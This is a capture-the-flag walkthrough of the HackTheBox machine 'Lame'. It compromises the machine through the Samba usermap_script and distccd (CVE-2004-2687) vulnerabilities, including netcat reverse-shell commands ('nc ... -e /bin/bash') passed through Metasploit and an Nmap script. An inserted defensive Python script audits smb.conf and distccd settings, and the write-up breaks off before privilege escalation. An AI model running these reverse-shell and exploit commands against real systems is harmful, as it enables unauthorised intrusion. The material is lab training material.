Lame — HackTheBox
Lame is an easy, beginner-friendly machine based on a Linux server. It is a good start for anyone who has begun practicing for the OSCP. This machine contains several ways to compromise it. Let's do it.

First, we will run Nmap to scan all ports and check for vulnerabilities.
>mkdir nmap
>nmap -sC -p- -sV -oS nmap/basic.out
The above command runs Nmap's default scripts and service version detection on all ports. The result of the scan is displayed below.
In the above results, we can see that some of the ports are open:
ftp - 21 - vsftpd 2.3.5
ssh - 22 - OpenSSH 4.7p1
NetBIOS smb - 139 - 3x-4x
samba - 445 - smbd 3.0.20
distccd - 3632
The FTP service, vsftpd, has anonymous login allowed here; you can check the details in the Nmap result. Well, I will log in via FTP. But nothing was found there; it's empty, and gaining access via FTP is not working here. So we can go for port 445, smbd 3.0.20, which has a vulnerability.
Let's check whether there is any vulnerability for smb 3.0.20 via searchsploit.
>searchsploit smb 3.0.20

This Samba version has several exploitation scripts. First, we can go for the Metasploit framework.
>msfconsole -q
>search username map script

>use exploit/multi/samba/usermap_script
Then we have to set values in this usermap_script.
>show options

>set RPORT 445
>set LHOST
>show options

After executing usermap_script, we got the initial access and also root access.
So we can capture both the user and root flags. But before that, I will check for the presence of Python to spawn a shell.
>python --version
Python 2.5.2 is installed there, so we can spawn a shell using Python.
>python -c 'import pty;pty.spawn("/bin/bash")'

Now let's check for the root and user flags in their home directories.
>cat /home/makis/user.txt
>cat /root/root.txt
There is another way to compromise the target server: port 3632 is open and running distccd. Let's check whether there is any vulnerability related to this service.
>nmap -p 3632 --script vuln -sV -oS nmap/nmap.vul.out
The result is displayed below.
In the above result, you can see a vulnerability, distcc-cve2004-2687, associated with this distccd. Let's check for exploit code in searchsploit.
>searchsploit distcc

The code is there in the Metasploit framework.
>msfconsole -q
>search distcc
>use exploit/unix/misc/distcc_exec
>set payload cmd/unix/generic
>set CMD nc 1122 -e /bin/bash
The above commands will execute the CMD value on the target server. So start a listener using Netcat.
>nc -nvlp 1122
Then run the Metasploit script.

We got the initial access.
Before privilege escalation, we can gain the same access without Metasploit.
On the Nmap official page, they explain the way to execute code remotely. Let's do that.

Execute the above-mentioned script to gain access. First set a listener on our computer using Netcat, then execute it.
>nc -nvlp 1122
>nmap -Pn -n -p3632 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc 1122 -e /bin/bash'"
It will give you initial access to the target server.
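
Both footholds above come down to service configuration: the Metasploit module used against Samba is named after the "username map script" option in smb.conf, and distccd on port 3632 accepted our connection without restriction. The following is an added example, not part of the original write-up, showing how a defender could audit a host for both conditions. The sample smb.conf, the distccd command lines and all function names are constructed for illustration.

```python
import re
import shlex

# Constructed sample inputs (not taken from the target in this write-up).
SAMPLE_SMB_CONF = """\
[global]
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAMPLE_DISTCCD_CMDLINES = [
    "distccd --daemon --user daemon",
    "distccd --daemon --allow 10.0.0.0/24 --listen 10.0.0.5",
    "distccd --daemon --allow 0.0.0.0/0",
]

def smb_global_params(text):
    """Return [global] smb.conf parameters; names lower-cased, spaces dropped."""
    params, section = {}, "global"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
        elif "=" in line and section == "global":
            key, value = line.split("=", 1)
            params["".join(key.lower().split())] = value.strip()
    return params

def audit_smb_conf(text):
    """Flag an active 'username map script' setting."""
    script = smb_global_params(text).get("usernamemapscript")
    return [f"smb.conf: 'username map script' is set to {script!r}"] if script else []

def audit_distccd(cmdline):
    """Flag a distccd command line with no, or a catch-all, --allow list."""
    args = shlex.split(cmdline)
    allows = [args[i + 1] for i, a in enumerate(args[:-1]) if a in ("-a", "--allow")]
    allows += [a.split("=", 1)[1] for a in args if a.startswith("--allow=")]
    if not allows:
        return ["distccd: no --allow restriction on the command line"]
    return [f"distccd: --allow {a} admits every address" for a in allows if a.endswith("/0")]

if __name__ == "__main__":
    findings = audit_smb_conf(SAMPLE_SMB_CONF)
    for cmd in SAMPLE_DISTCCD_CMDLINES:
        findings += audit_distccd(cmd)
    print("\n".join(findings))
```

On a real host, feed it the contents of smb.conf and the distccd command line taken from the process list.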

Now let's spawn a shell to get a good interactive TTY. Python is already there, so let's execute a Python shell-spawning command.
>python -c 'import pty;pty.spawn("/bin/bash")'
By executing uname -a we can see the OS details.
>uname -a
It shows that the target server is Linux 2.6.24-16 server. There are many kernel exploits available in exploitdb. Let's do it.
……I will add remaining after some time……
Thanks for reading. I hope it is useful to you. If there are any errors, contact me via LinkedIn.